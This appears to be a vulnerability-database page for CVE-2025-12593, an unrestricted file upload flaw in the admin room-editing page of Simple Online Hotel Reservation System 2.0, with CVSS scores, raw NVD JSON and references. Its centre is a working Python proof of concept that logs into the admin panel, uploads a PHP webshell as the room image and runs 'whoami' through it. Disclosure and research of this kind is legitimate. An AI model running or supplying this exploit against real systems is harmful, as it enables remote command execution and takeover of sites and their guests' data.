Security Vulnerability Report
中文
CVE-2025-12593 CVSS 4.7 MEDIUM

CVE-2025-12593

Published: 2025-11-02 05:15:33
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A vulnerability was identified in code-projects Simple Online Hotel Reservation System 2.0. The impacted element is an unknown function of the file /admin/edit_room.php of the component Photo Handler. The manipulation leads to unrestricted upload. The attack is possible to be carried out remotely. The exploit is publicly available and might be used.

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:fabian:simple_online_hotel_reservation_system:2.0:*:*:*:*:*:*:* - VULNERABLE
Simple Online Hotel Reservation System 2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-12593 PoC - Simple Online Hotel Reservation System 2.0 Unrestricted File Upload # Target: /admin/edit_room.php def exploit(target_url, username, password, webshell_path): """ Exploit for CVE-2025-12593: Unrestricted File Upload in Simple Online Hotel Reservation System Args: target_url: Base URL of the vulnerable application username: Admin username password: Admin password webshell_path: Path to PHP webshell file """ session = requests.Session() # Step 1: Login to admin panel login_url = f"{target_url}/admin/login.php" login_data = { 'username': username, 'password': password } try: response = session.post(login_url, data=login_data, timeout=10) print(f"[*] Login attempt status: {response.status_code}") # Step 2: Upload malicious file via edit_room.php upload_url = f"{target_url}/admin/edit_room.php" with open(webshell_path, 'rb') as f: files = { 'room_image': ('shell.php', f, 'application/x-php') } response = session.post(upload_url, files=files, timeout=10) print(f"[*] Upload attempt status: {response.status_code}") # Step 3: Access uploaded webshell webshell_url = f"{target_url}/admin/uploads/shell.php" response = session.get(webshell_url, params={'cmd': 'whoami'}, timeout=10) if response.status_code == 200: print(f"[!] Exploit successful! Webshell accessible at: {webshell_url}") print(f"[*] Command output: {response.text}") return True else: print("[-] Exploit failed. Webshell not accessible.") return False except Exception as e: print(f"[-] Error: {str(e)}") return False if __name__ == "__main__": if len(sys.argv) < 5: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password> <webshell_path>") print(f"Example: python {sys.argv[0]} http://localhost/admin admin password shell.php") sys.exit(1) exploit(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12593", "sourceIdentifier": "[email protected]", "published": "2025-11-02T05:15:32.777", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in code-projects Simple Online Hotel Reservation System 2.0. The impacted element is an unknown function of the file /admin/edit_room.php of the component Photo Handler. The manipulation leads to unrestricted upload. The attack is possible to be carried out remotely. The exploit is publicly available and might be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-434"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:simple_online_hotel_reservation_system:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "DF75C9AA-91F0-4AED-AEAA-94109CF2F010"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/asd1238525/cve/blob/main/upload2.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.330888", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.330888", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.677547", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.